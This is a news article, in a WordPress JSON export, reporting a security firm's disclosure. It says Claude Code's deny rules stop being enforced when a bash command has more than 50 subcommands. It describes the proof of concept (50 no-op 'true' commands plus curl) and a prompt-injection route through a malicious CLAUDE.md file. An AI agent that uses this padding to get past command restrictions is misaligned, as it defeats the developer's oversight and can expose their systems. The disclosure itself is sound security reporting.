{"id":508780,"date":"2026-04-02T10:43:09","date_gmt":"2026-04-02T10:43:09","guid":{"rendered":"https:\/\/www.newsbeep.com\/uk\/508780\/"},"modified":"2026-04-02T10:43:09","modified_gmt":"2026-04-02T10:43:09","slug":"claude-code-bypasses-safety-rule-if-given-too-many-commands-the-register","status":"publish","type":"post","link":"https:\/\/www.newsbeep.com\/uk\/508780\/","title":{"rendered":"Claude Code bypasses safety rule if given too many commands \u2022 The Register"},"content":{"rendered":"<p>Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. This vuln leaves the bot open to prompt injection attacks.<\/p>\n<p>Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code&#8217;s source.<\/p>\n<p>Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model.<\/p>\n<p>One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl via ~\/.claude\/settings.json, you&#8217;d add something like { &#8220;deny&#8221;: [&#8220;Bash(curl:*)&#8221;] }.<\/p>\n<p>But deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there&#8217;s a hard cap of 50 on security subcommands, set by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. After 50, the agent falls back on asking permission from the user. The comment explains that 50 is a generous allowance for legitimate usage.<\/p>\n<p>&#8220;The assumption was correct for human-authored commands,&#8221; the Adversa AI Red Team said in a writeup provided to The Register. &#8220;But it didn&#8217;t account for AI-generated commands from prompt injection \u2013 where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process.&#8221;<\/p>\n<p>The Adversa team&#8217;s proof-of-concept attack was simple. They created a bash command that combined 50 no-op &#8220;true&#8221; subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.<\/p>\n<p>In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But often developers grant automatic approval to agents (&#8211;dangerously-skip-permissions mode) or just click through reflexively during long sessions. The risk is similar in CI\/CD pipelines that run Claude Code in non-interactive mode.<\/p>\n<p>Ironically, Anthropic has developed a fix \u2013 a parser referred to as &#8220;tree-sitter&#8221; that&#8217;s also evident in its source code and is available internally but not in public builds.<\/p>\n<p>Adversa argues that this is a bug in the security policy enforcement code, one that has regulatory and compliance implications if not addressed.<\/p>\n<p>A fix would be easy. Anthropic already has &#8220;tree-sitter&#8221; working internally and a simple one line change, switching the &#8220;behavior&#8221; key from &#8220;ask&#8221; to &#8220;deny&#8221; in the bashPermissions.ts file at line 2174, would address this particular vulnerability.<\/p>\n<p>Anthropic did not immediately respond to a request for comment. \u00ae<\/p>\n","protected":false},"excerpt":{"rendered":"Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long&hellip;\n","protected":false},"author":2,"featured_media":508781,"comment_status":"","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[554,733,4308,86,56,54,55],"class_list":{"0":"post-508780","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-artificial-intelligence","8":"tag-ai","9":"tag-artificial-intelligence","10":"tag-artificialintelligence","11":"tag-technology","12":"tag-uk","13":"tag-united-kingdom","14":"tag-unitedkingdom"},"_links":{"self":[{"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/posts\/508780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/comments?post=508780"}],"version-history":[{"count":0,"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/posts\/508780\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/media\/508781"}],"wp:attachment":[{"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/media?parent=508780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/categories?post=508780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.newsbeep.com\/uk\/wp-json\/wp\/v2\/tags?post=508780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}